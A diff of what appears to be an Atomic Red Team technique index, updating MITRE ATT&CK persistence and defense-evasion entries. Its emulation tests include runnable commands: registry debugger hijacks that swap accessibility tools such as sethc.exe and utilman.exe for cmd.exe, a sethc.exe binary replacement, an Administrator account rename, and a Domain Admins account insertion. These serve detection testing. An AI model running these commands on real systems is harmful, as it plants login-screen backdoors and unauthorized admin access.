@@ -42492,8 +34959,8 @@ defense-evasion: it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " x_mitre_data_sources: - - System calls - - Process monitoring + - 'Process: OS API Execution' + - 'Module: Module Load' x_mitre_platforms: - Linux x_mitre_is_subtechnique: true @@ -42535,14 +35002,12 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' + modified: '2021-04-12T18:27:52.298Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_defense_bypassed: - Firewall - Host intrusion prevention systems @@ -42561,16 +35026,17 @@ defense-evasion: - User - Administrator x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD + - Google Workspace + - Containers x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Netskope - Mark Wee - Praetorian @@ -42642,10 +35108,8 @@ defense-evasion: may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications. x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Rodrigo Garcia, Red Canary x_mitre_platforms: 
@@ -42653,14 +35117,6 @@ defense-evasion: atomic_tests: [] T1497: technique: - created: '2019-04-17T22:22:24.505Z' - modified: '2020-07-01T16:32:02.272Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the @@ -42691,6 +35147,14 @@ defense-evasion: description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-21T15:16:10.835Z' + created: '2019-04-17T22:22:24.505Z' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - Anti-virus @@ -42705,8 +35169,9 @@ defense-evasion: - macOS - Linux x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -42751,7 +35216,7 @@ defense-evasion: modified: '2020-10-21T22:37:49.258Z' created: '2020-10-19T18:47:08.759Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify 
@@ -42780,7 +35245,7 @@ defense-evasion: source_name: Pass The Cookie - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 
@@ -42789,7 +35254,7 @@ defense-evasion: description: |- Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie) - Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. + Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. 
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) id: attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0 @@ -42799,9 +35264,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.527Z' + modified: '2021-04-14T13:21:37.474Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -42809,13 +35274,14 @@ defense-evasion: applications by the same user in different locations or by different systems that do not match expected configurations. x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Johann Rehberger x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1222.001: technique: @@ -42871,10 +35337,10 @@ defense-evasion: Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014) x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Metadata' x_mitre_platforms: - Windows identifier: T1222.001 
@@ -43061,7 +35527,7 @@ defense-evasion: * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe script[.]jpeg script[.]jpeg - Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) + Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic) @@ -43104,7 +35570,7 @@ defense-evasion: kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-20T22:45:46.479Z' + modified: '2021-02-09T15:07:00.842Z' created: '2018-10-17T00:14:20.652Z' x_mitre_is_subtechnique: false x_mitre_system_requirements: 
@@ -43122,10 +35588,8 @@ defense-evasion: - Application control - Digital Certificate Validation x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Process use of network - - DLL monitoring + - 'Process: Process Creation' + - 'Module: Module Load' x_mitre_contributors: - Avneet Singh - Casey Smith 
@@ -43257,9 +35721,10133 @@ defense-evasion: ' name: command_prompt +persistence: + T1546.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.008 + url: https://attack.mitre.org/techniques/T1546/008 + - external_id: CAPEC-558 + source_name: capec + url: https://capec.mitre.org/data/definitions/558.html + - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' + source_name: FireEye Hikit Rootkit + - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom + description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to + the Kingdom. Retrieved July 5, 2017. + source_name: DEFCON2016 Sticky Keys + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - source_name: Narrator Accessibility Abuse + url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html + description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' + URI for Fileless Persistence. Retrieved April 28, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Accessibility Features + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). 
An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. + + Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + + Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. + + For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. 
(Citation: Tilbury 2014) + + Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) + + * On-Screen Keyboard: C:\Windows\System32\osk.exe + * Magnifier: C:\Windows\System32\Magnify.exe + * Narrator: C:\Windows\System32\Narrator.exe + * Display Switcher: C:\Windows\System32\DisplaySwitch.exe + * App Switcher: C:\Windows\System32\AtBroker.exe + id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-13T20:37:30.048Z' + created: '2020-01-24T14:32:40.315Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Changes to accessibility utility binaries or binary paths + that do not correlate with known software, patch cycles, etc., are suspicious. + Command line invocation of tools capable of modifying the Registry for associated + keys are also suspicious. Utility arguments and the binaries themselves should + be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Paul Speulstra, AECOM Global Security Operations Center + x_mitre_platforms: + - Windows + identifier: T1546.008 + atomic_tests: + - name: Attaches Command Prompt as a Debugger to a List of Target Processes + auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + description: | + Attaches cmd.exe to a list of processes. 
Configure your own Input arguments to a different executable or list of executables. + + Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + supported_platforms: + - windows + input_arguments: + parent_list: + description: 'Comma separated list of system binaries to which you want + to attach each #{attached_process}. Default: "osk.exe" + +' + type: String + default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, + atbroker.exe + attached_process: + description: 'Full path to process to attach to target in #{parent_list}. + Default: cmd.exe + +' + type: Path + default: C:\windows\system32\cmd.exe + executor: + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } + cleanup_command: | + $input_table = "#{parent_list}".split(",") + Foreach ($item in $input_table) + { + $item = $item.trim() + reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null + } + name: powershell + elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y 
C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true + T1098: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1098 + url: https://attack.mitre.org/techniques/T1098 + - source_name: Microsoft User Modified Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account + was changed. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 + - description: Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. + Retrieved November 4, 2019. + url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 + source_name: Microsoft Security Event 4670 + - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM + description: Warren, J. (2017, July 11). Manipulating User Passwords with + Mimikatz. Retrieved December 4, 2017. + source_name: InsiderThreat ChangeNTLM July 2017 + - url: https://github.com/gentilkiwi/mimikatz/issues/92 + description: 'Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm + work, but generate Windows events #92. Retrieved December 4, 2017.' + source_name: GitHub Mimikatz Issue 92 June 2017 + description: Adversaries may manipulate accounts to maintain access to victim + systems. Account manipulation may consist of any action that preserves adversary + access to a compromised account, such as modifying credentials or permission + groups. These actions could also include account activity designed to subvert + security policies, such as performing iterative password updates to bypass + password duration policies and preserve the life of compromised credentials. 
+ In order to create or manipulate accounts, the adversary must already have + sufficient permissions on systems or the domain. + name: Account Manipulation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T16:21:28.502Z' + created: '2017-05-31T21:31:12.196Z' + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_contributors: + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + - Praetorian + - Tim MalcomVetter + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Group: Group Modification' + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + x_mitre_detection: |- + Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) + + Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. + + Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. 
+ x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - IaaS + - Linux + - macOS + - Google Workspace + identifier: T1098 + atomic_tests: + - name: Admin Account Manipulate + auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af + description: 'Manipulate Admin Account Name + +' + supported_platforms: + - windows + executor: + command: | + $x = Get-Random -Minimum 2 -Maximum 9999 + $y = Get-Random -Minimum 2 -Maximum 9999 + $z = Get-Random -Minimum 2 -Maximum 9999 + $w = Get-Random -Minimum 2 -Maximum 9999 + Write-Host HaHa_$x$y$z + + $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name + + foreach($member in $fmm) { + if($member -like "*Administrator*") { + $account = $member.Name -replace ".+\\\","" # strip computername\ + $originalDescription = (Get-LocalUser -Name $account).Description + Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description + Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation + Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME + } + } + cleanup_command: | + $list = Get-LocalUser |?{$_.Description -like "atr:*"} + foreach($u in $list) { + $u.Description -match "atr:(?[^;]+);(?.*)" + Set-LocalUser -Name $u.Name -Description $Matches.Description + Rename-LocalUser -Name $u.Name -NewName $Matches.Name + Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME + } + name: powershell + elevation_required: true + - name: Domain Account and Group Manipulate + auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + description: "Create a random atr-nnnnnnnn account and add it to a domain group + (by default, Domain Admins). \n\nThe quickest way to run it is against a domain + controller, using `-Session` of `Invoke-AtomicTest`. 
Alternatively,\nyou need + to install PS Module ActiveDirectory (in prereqs) and run the script with + appropriare AD privileges to \ncreate the user and alter the group. Automatic + installation of the dependency requires an elevated session, \nand is unlikely + to work with Powershell Core (untested).\n\nIf you consider running this test + against a production Active Directory, the good practise is to create a dedicated\nservice + account whose delegation is given onto a dedicated OU for user creation and + deletion, as well as delegated\nas group manager of the target group.\n\nExample: + `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and + Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n" + supported_platforms: + - windows + input_arguments: + account_prefix: + description: | + Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on + a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. 
+ type: String + default: atr- + group: + description: Name of the group to alter + type: String + default: Domain Admins + create_args: + description: Additional string appended to New-ADUser call + type: String + default: '' + dependencies: + - description: 'PS Module ActiveDirectory + +' + prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop + | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + command: | + $x = Get-Random -Minimum 2 -Maximum 99 + $y = Get-Random -Minimum 2 -Maximum 99 + $z = Get-Random -Minimum 2 -Maximum 99 + $w = Get-Random -Minimum 2 -Maximum 99 + + Import-Module ActiveDirectory + $account = "#{account_prefix}-$x$y$z" + New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} + Add-ADGroupMember "#{group}" $account + cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" + | Remove-ADUser -Confirm:$False + +' + name: powershell + T1547.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.014 + url: https://attack.mitre.org/techniques/T1547/014 + - source_name: Klein Active Setup 2010 + url: https://helgeklein.com/blog/2010/04/active-setup-explained/ + description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved + December 18, 2020. + - source_name: Mandiant Glyer APT 2010 + url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf + description: Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. + Retrieved December 18, 2020. 
+ - source_name: Citizenlab Packrat 2015 + url: https://citizenlab.ca/2015/12/packrat-report/ + description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved + December 18, 2020. + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: SECURELIST Bright Star 2015 + url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ + description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really + Spreading through the Bright Star?. Retrieved December 18, 2020. + - source_name: paloalto Tropic Trooper 2016 + url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ + description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese + Government and Fossil Fuel Provider With Poison Ivy. Retrieved December + 18, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Active Setup + description: |- + Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level. 
+ + Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) + + Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-05T22:36:37.414Z' + created: '2020-12-18T16:33:13.098Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. 
+ x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_contributors: + - Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD) + x_mitre_platforms: + - Windows + atomic_tests: [] + T1098.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.003 + url: https://attack.mitre.org/techniques/T1098/003 + - source_name: Microsoft Support O365 Add Another Admin, October 2019 + url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d + description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. + - source_name: Microsoft O365 Admin Roles + url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide + description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. + al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Add Office 365 Global Administrator Role + description: "An adversary may add the Global Administrator role to an adversary-controlled + account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft + Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin + Roles) With sufficient permissions, a compromised account can gain almost + unlimited access to data and settings (including the ability to reset the + passwords of other admins) via the global admin role.(Citation: Microsoft + O365 Admin Roles) \n\nThis account modification may immediately follow [Create + Account](https://attack.mitre.org/techniques/T1136) or other malicious account + activity." 
+ id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T12:40:02.331Z' + created: '2020-01-19T16:59:45.362Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Collect usage logs from cloud administrator accounts to + identify unusual activity in the assignment of roles to those accounts. Monitor + for accounts assigned to admin roles that go over a certain threshold of known + admins. ' + x_mitre_data_sources: + - 'User Account: User Account Modification' + x_mitre_contributors: + - Microsoft Threat Intelligence Center (MSTIC) + x_mitre_platforms: + - Office 365 + atomic_tests: [] + T1137.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.006 + url: https://attack.mitre.org/techniques/T1137/006 + - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460 + description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017. + source_name: Microsoft Office Add-ins + - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ + description: Knowles, W. (2017, April 21). Add-In Opportunities for Office + Persistence. Retrieved July 3, 2017. + source_name: MRWLabs Office Persistence Add-ins + - source_name: FireEye Mail CDS 2018 + url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf + description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! + Enterprise Email Compromise. Retrieved April 22, 2019. + - source_name: GlobalDotName Jun 2019 + url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique + description: Shukrun, S. (2019, June 2). 
Office Templates and GlobalDotName + - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Add-ins + description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence + on a compromised system. Office add-ins can be used to add functionality to + Office programs. (Citation: Microsoft Office Add-ins) There are different + types of add-ins that can be used by the various Office products; including + Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object + Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools + for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office + Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used + to obtain persistence because they can be set to execute code when an Office + application starts. " + id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:34:02.877Z' + created: '2019-11-07T19:52:52.801Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. 
